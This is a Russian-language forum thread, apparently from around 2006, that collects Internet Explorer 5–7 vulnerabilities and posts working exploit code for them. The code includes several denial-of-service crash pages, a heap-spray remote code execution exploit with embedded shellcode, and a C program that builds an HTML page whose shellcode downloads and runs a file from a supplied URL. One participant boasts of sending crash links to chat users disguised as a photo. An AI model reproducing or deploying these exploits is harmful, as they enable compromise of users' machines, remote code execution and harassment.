Microsoft Internet Explorer

Отслеживать

Ŧ1LAN

CPU register
Пользователь
Регистрация
19.12.2005
Сообщения
1 057
Решения
1
Реакции
6
Отказ в обслуживании Microsoft Internet Explorer
Уязвимые версии: Microsoft Internet Explorer 5.01, 5.5, 6.0

Описание:
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании браузера.
Обнаружено разыменование нулевого указателя при обработке значения атрибута 'datasrc'. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать аварийное завершение работы браузера.

Пример:
Код: 
> <table datasrc=".">

Патч на момент постинга не вышел.

:zns2: Производитель

[mod] [Winux:] Вот так надо посты оформлять.[/mod]
 
Вот еще один сплойт. На текущий момент - 0-day
Отказ в обслуживании MSIE.

Код сплойта:
Код: 
<!--
-------------------------------------------------------------------------------------------
Internet Explorer Version 6.0.2900.2180.xpsp_sp2 mshtml.dll <div> Denial of Service exploit
by rgod

site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original poc: http://rgod.altervista.org/ie_6_sp2_crash.html
-------------------------------------------------------------------------------------------
-->
<head>
<style><!--
#page div p:first-child:first-letter {
border-bottom: 2px ridge #F5DEB3;
}
//-->
</style>
</head>
<body><div id="page"><div><p><strong>suntzu</strong></p>

Если такой код встретится в странице - вызовется ошибка и наш ослик закроется. Радуемся :punk:
 
Отказ в обслуживании в Microsoft Internet Explorer
Программа: Microsoft Internet Explorer 5, 6
Описание:
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании приложения.

Уязвимость существует при обработке некорректных элементов IMG тега совместно с некорректным XML блоком. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать отказ в обслуживании браузера.

Пример:
Код: 
<table><tr><td><IMG align=left>X X X<?xml:namespace
prefix=v ><v:X style="HEIGHT:1"></td></tr></table>

Решение: Способов устранения уязвимости не существует в настоящее время.
:zns2: www.microsoft.com
Источник: www.securitylab.ru
 
Окказ в обслуживании в Internet Explorer
Уязвимые версии: Internet Explorer 7.0 Beta 2 (7.0.5296.0)
Описание:
Обнаружена уязвимость в модуле "urlmon.dll", предназначенного для выполнения разбора HTML документов. Уязвимость заключается в недостаточных условиях ограничений обработки путя в теги "BGSOUND SRC" при использование протокола "file://". Таким образом злоумышленник указав длинный путь(например: 344 знака "-"), может вызвать "отказ от обслуживания" приложения и выполнить произвольный программный код.
Эксплойт:
Код: 
<BGSOUND
SRC=file://---------------------------------------------------------------------
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
---------------------------------- >
Подробнее
 
Выполнение произвольного кода в Internet Explorer
Программа: Microsoft Internet Explorer 5.01, 5.5, 6.0
Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать уязвимую систему.

Уязвимость существует при обработке Drag-And-Drop событий. Удаленный пользователь может с помощью специально сформированной Web страницы установить произвольные файлы на систему пользователя, что может привести в дальнейшем к выполнению злонамеренного приложения. Уязвимость может быть эксплуатирована с помощью любого Drag-And-Drop события, включая использование прокрутки окна браузера.

Решение: Способов устранения уязвимости не существует в настоящее время.
:zns2: производитель
 
Обход ограничений безопасности в Internet Explorer
Программа: Microsoft Internet Explorer 6.0
Описание:
Уязвимость позволяет удаленному пользователю обойти ограничения безопасности.

Уязвимость существует из-за того, что сетевая папка может быть включена в iframe, где только часть содержимого видно пользователю. Злоумышленник может обманом заставить пользователя удалить локальные папки на системе с помощью iframe ссылки "\\127.0.0.1\c$\".

Для удачной эксплуатации уязвимости пользователь должен выбрать иконку папки, нажать клавишу удаления и утвердительно ответить в диалоговом окне "Folder Delete".

Решение: Способов устранения уязвимости не существует в настоящее время.
 
MS Internet Explorer 6.0 (script action handlers) (mshtml.dll) DoS
программа: Microsoft Internet Explorer 6.0
описание:
дыра теоретически позволяет злоумышленникам спровоцировать аварийное завершение работы программы через сформированную специальным образом веб-страницу.
Проблема связана с ошибкой переполнения буфера, возникающей в библиотеке mshtml.dll при взаимодействии с тегами, содержащими большое количество обработчиков событий, например, onLoad, onMouseMove и прочее. В интернете уже появился пример кода, по средствам которого можно аварийно закрыть браузер. Кстати, уязвимость может быть задействована на полностью пропатченных компьютерах с операционной системой Microsoft Windows ХР и вторым пакетом обновлений.
И при определенных условиях баг может использоваться хакерами с целью выполнения вредоносного кода на удаленных компьютерах
Решение:Способов устранения дыры в настоящее время не существует.
Разве что могу посоветовать переходить пока на Firefox или Opera.
Пример/эксплоит:
h**p://lcamtuf.coredump.cx/iedie.html (с ослика лучше не заходите...)
http://www.milw0rm.com/exploits/1598 (сюда можно)
 
почитал и ох*ел это что-ж получается что ослик сплош как дуршлаг дырявый???? Теперь не буду никогда жалеть что в опере не грузятся некоторые странички.... Ужас!
 
мда пора забывать что ослик вообше есть.... ибо он слишком небезопасен..... гы гы гы .....
 
мда пора забывать что ослик вообше есть.... ибо он слишком небезопасен..... гы гы гы ....
Пора бы, у меня почти все знакомые на осле сидят...
 
Код: 
<!-- 
 -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ 
/\ 
\/   Internet Explorer Remote Code Execution Exploit v 0.1 
/\        by Darkeagle of Unl0ck Research Team 
\/ 
/\   used SkyLined idea of exploitation. special tnx goes to him. 
\/ 

Affected Software   :  Mcft Internet Explorer 6.x, IE7 Beta 2 
Severity      :  Critical 
Impact      :  Remote System Access 
Solution Status   :  ** UNPATCHED ** 
Discovered by    :  Computer Terrorism (UK) 
Advisory Date   :  22nd March, 2006 
Tested      :  WinXP SP2 RUS IE 6.0 (full patched) 

Vulnerability details: 

PoC from CyberTerrorists crashes IE and overwrites EIP. EIP points to unknown place. 
In my case it points to 0x3c0474c2. 
Exploit fills heap with "nops+shellcode" 'til 0x3CxxXXxx. Then IE trys to read memory 
@ 0x3c0474c2. At this time 0x3c0474c2 contains nops+shellcode. In the end IE executes 
shellcode. 

Exploit needs more RAM. 
Tested under 192mb RAM with 800mb of maximum page cache. 

Under 512mb code was executed after 1-1.5 minutes. 

Successfull exploitation will execute standart windows calculator. 

Greets: 
      Unl0ck Researchers, 
      0x557 guys, 
      ph4nt0m guys, 
      sh0k, uf0, 
      BlackSecurity guys, 
      many otherz. 

/\   http://unl0ck.net 
\/    
/\   (c) 2004 - 2006 
\/ 
 -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ 
 --> 

<input type="checkbox" id="blah"> 
<script language="javascript"> 

shellcode = unescape(   "%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" + 
         "%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" + 
         "%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" + 
         "%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" + 
         "%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" + 
         "%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" + 
         "%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" + 
         "%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" + 
         "%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" + 
         "%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + 
         "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" + 
         "%uCC4A%uD0FF"); 

    bigblock = unescape("%u9090%u9090"); 
    slackspace = 20 + shellcode.length 

    while (bigblock.length < slackspace) 
      bigblock += bigblock; 

    fillblock = bigblock.substring(0, slackspace); 

    block = bigblock.substring(0, bigblock.length-slackspace); 

    while(block.length + slackspace < 0x40000) 
      block = block + block + fillblock; 

    memory = new Array(); 

    for ( i = 0; i < 2020; i++ ) 
      memory[i] = block + shellcode; 
  
    var r = document.getElementById('blah').createTextRange(); 

</script>
 
Последний експлойт хорош...експлорер повис хорошенько!Ети експлойты хороши,когда сидишь в чате,отправляешь в чат ссылку с експлойтом,мол ето моя фотка или просто флудишь....и наблюдаешь как постпенно чат вымирает.
 
воть довольно неплохой сплоит. )))
с помощью этого эксплоита можно получит полный доступ к удалённоуму компу и это при полном апдейте безопасности и по словам автора Solution Status: Unpatched.
Internet Explorer "createTextRang" Download Shellcoded Exploit (2)
Код: 
/*
*
* Internet Explorer "createTextRang" Download Shellcoded Exploit (2)
* Bug discovered by Computer Terrorism (UK)
* http://www.computerterrorism.com/research/ct22-03-2006
*
* Affected Software: Microsoft Internet Explorer 6.x & 7 Beta 2
* Severity: Critical
* Impact: Remote System Access
* Solution Status: Unpatched
*
* E-Mail: atmaca@icqmail.com
* Web: http://www.spyinstructors.com,http://www.atmacasoft.com
* Credit to Kozan,SkyLined,delikon,Darkeagle,Stelian Ene
*
*/

/*
*
* This one is more faster than all released createTextRange exploits
* because it uses last version of SkyLined's heap spraying code,
* special 10x goes to him.
*
*/

#include <windows.h>
#include <stdio.h>

#define BUF_LEN         0x800
#define FILE_NAME       "index.htm"

char body1[] =
	"<input type=\"checkbox\" id=\"blah\">\r\n"
	"<script language=\"javascript\">\r\n\r\n"
	"\tvar heapSprayToAddress = 0x3c0974c2;\r\n\r\n"
	"\tvar payLoadCode = unescape(\"%u9090%u9090%u9090\" +\r\n"
	"\t\"%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC\" +\r\n"
	"\t\"%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0\" +\r\n"
	"\t\"%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877\" +\r\n"
	"\t\"%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0\" +\r\n"
	"\t\"%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456\" +\r\n"
	"\t\"%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D\" +\r\n"
	"\t\"%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A\" +\r\n"
	"\t\"%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC\" +\r\n"
	"\t\"%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124\" +\r\n"
	"\t\"%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000\" +\r\n"
	"\t\"%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u686D%u2E68%u7865\" +\r\n"
	"\t\"%u0065";

char body2[] =
	"\r\n\r\n\tvar heapBlockSize = 0x400000;\r\n\r\n"
	"\tvar payLoadSize = payLoadCode.length * 2;\r\n\r\n" 
	"\tvar spraySlideSize = heapBlockSize - (payLoadSize+0x38);\r\n\r\n"
	"\tvar spraySlide = unescape(\"%u9090%u9090\");\r\n" 
	"\tspraySlide = getSpraySlide(spraySlide,spraySlideSize);\r\n\r\n"
	"\theapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;\r\n\r\n"
	"\tmemory = new Array();\r\n\r\n"
	"\tfor (i=0;i<heapBlocks;i++)\r\n" 
	"\t{\r\n\t\tmemory[i] = spraySlide + payLoadCode;\r\n\t}\r\n\r\n"
	"\tvar r = document.getElementById('blah').createTextRange();\r\n\r\n"
	"\tfunction getSpraySlide(spraySlide, spraySlideSize)\r\n" 
	"\t{\r\n\t\twhile (spraySlide.length*2<spraySlideSize)\r\n\t\t{\r\n"
	"\t\t\tspraySlide += spraySlide;\r\n\t\t}\r\n"	
	"\t\tspraySlide = spraySlide.substring(0,spraySlideSize/2);\r\n"
	"\t\treturn spraySlide;\r\n"
	"\t}\r\n\r\n</script>";


int main(int argc,char *argv[])
{
        if (argc < 2)
        {
                printf("\nInternet Explorer \"createTextRang\" Download Shellcoded Exploit (2)");
    printf("\nCoded by ATmaCA (atmaca[at]icqmail.com)\n");
                printf("\nUsage:\n");
                printf("ie_exp <WebUrl>\n");

                return 0;
        }

        FILE *File;
        char *pszBuffer;
        char *web = argv[1];
        char *pu = "%u";
        char u_t[5];
        char *utf16 = (char*)malloc(strlen(web)*5);

        if ( (File = fopen(FILE_NAME,"w+b")) == NULL ) {
                printf("\n [Err:] fopen()");
                exit(1);
        }

        pszBuffer = (char*)malloc(BUF_LEN);
        memcpy(pszBuffer,body1,sizeof(body1)-1);

        memset(utf16,'\0',strlen(web)*5);
        for (unsigned int i=0;i<strlen(web);i=i+2)
        {
                sprintf(u_t,"%s%.2x%.2x", pu, web[i+1], web[i]);
                strcat(utf16,u_t);
        }

        strcat(pszBuffer,utf16);
        strcat(pszBuffer,"%u0000\");");
        strcat(pszBuffer,body2);

        fwrite(pszBuffer, BUF_LEN, 1,File);
        fclose(File);

        printf("\n\n"  FILE_NAME  " has been created in the current directory.\n");
        return 1;
}

// milw0rm.com [2006-03-31]
 
Вот ещё пара примеров позволяющих вызвать отказ от обслуживании в IE.
_http://lcamtuf.coredump.cx/iedie2-1.html (eax=0x0, instant dereference)
_http://lcamtuf.coredump.cx/iedie2-2.html (bogus esi on reload/leave)
_http://lcamtuf.coredump.cx/iedie2-3.html (page fault on browser close)
_http://lcamtuf.coredump.cx/iedie2-4.html (bogus esi on reload/leave)
Уязвимость существует в библиотеке mshtml.dll при обработке тега OBJECT
 
MS Internet Explorer <= 6.0.2900 SP2 (CSS Attribute) Denial of Service
Эксплоит:
Код: 
<html>
<head>
</style>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>IE-Crash - By seven</title>
<style type="text/css">

#header{
position: fixed;
height: 761px;
width: 1268;
}
</style>
</head>
<body>
<table border="2" cellpadding="0" cellspacing="0" width="797" height="343" align="center">

    <tr>

    <td id="header" valign="top">

        </td>
<td valign="top">

        </td>
</table>
 
Повреждение памяти в старых осликах
Код: 
<html>
<head>
<title>Internet Explorer Ver 6.0.2800.1106</title>
</head>
<body>
<script>
var wwidth = (window.innerWidth)?window.innerWidth: ((document.all
)?document.body.offsetWidth:null); 

while (wwidth)
{
self.resizeBy(-999999, -1);
} 

</script> 

</body>
</html>
За неимением старого ослика, проверить баг не удалось. Однако Огнелис работать отказался, выкинул окошко с просьбой прибить вражеский js. Опера не реагирует.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх